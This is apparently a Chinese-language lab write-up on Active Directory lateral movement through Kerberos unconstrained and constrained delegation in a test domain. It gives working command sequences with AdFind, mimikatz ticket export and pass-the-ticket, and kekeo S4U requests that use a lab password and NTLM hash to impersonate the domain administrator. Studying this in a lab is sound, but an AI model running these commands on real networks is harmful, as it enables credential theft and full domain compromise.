案例一: 横向移动-原理利用-非约束委派
该案例建立了解即可,真实环境应该不可能有人这样配置
非约束委派的原理和利用场景
原理:机器 A (域控)访问具有非约束委派权限的机器 B 的服务,会把当前认证用户(域管用户)的的 TGT 放在 ST 票据中,一起发送给机器 B ,机器 B 会把 TGT 存储在 lsass 进程中以备下次重用。从而机器 B 就能使用这个 TGT 模拟认证用户(域管用户)访问服务。利用场景攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的 TGT ,从而模拟域管用户。
实验环境 god.org
配置环境
首先需要把webserver的computer中委派,设置为信任任何服务
利用这条命令进行更新
setspn -U -A priv/test webadmin
更新后在该用户的属性就会出现委派一栏
而别的用户中不会出现这一栏
msf上线并且提权到system权限
利用ADFIND工具进行查询非约束委派的账户
本来应该设置代理,在本地运行,但是我是linux系统我就直接上传了
adfind下载地址
https://www.softpedia.com/get/Programming/Other-Programming-Files/AdFind.shtml
执行命令
AdFind.exe -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn
让域控主机访问webadmin,正常应该是设置钓鱼
访问过以后让webserver利用mimikatz导出票据
mimikatz sekurlsa::tickets /export
利用管理员的身份伪造票据
mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;9eb18]-2-0-40e00000-Administrator@krbtgt-GOD.ORG.kirbi
利用该身份就可以访问域控,记得用主机名去访问
案例二: 横向移动-原理利用-约束委派
非约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派,约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控
环境配置
然后点击确定,添加服务cifs
给对应的用户也添加上该服务环境配置完成
正常cs控制webserver,并且提权到了system权限后
查询域内设置了约束委派账户的命令
shell c:\users\webadmin\desktop\AdFind.exe -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
查询域内设置了约束委派机器的命令
shell AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
利用kekeo去请求TGT
记得利用system权限去抓取mimikatz
明文:
shell kekeo "tgt::ask /user:webadmin /domain:god.org /password:admin!@#45" "exit" hash值:
shell kekeo "tgt::ask /user:webadmin /domain:god.org /NTLM:579da618cfbfa85247acf1f800a280a4" "exit"
这里我还是直接上传,真实环境在本地设置代理,在本地运行
通过这刚刚生成的TGT伪造s4u请求以Administrator用户身份去访问域控的的CIFS的ST,S4U2Self 获取到的 ST1 以及 S4U2Proxy 获取到的 AD-2008 CIFS 服务的 ST2 会保存在当前⽬录下。
shell kekeo.exe "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/OWA2010CN-God.god.org" "exit"
利用mimikatz导入票据
mimikatz kerberos::ptt
TGS_Administrator@god.org@GOD.ORG_cifs~OWA2010CN-God.god.org@GOD.ORG.kirbishell dir \\OWA2010SP3\c$
查看当前票据
访问目标文件加夹
先写到这里后面还有一个综合性靶场以后再做把^_^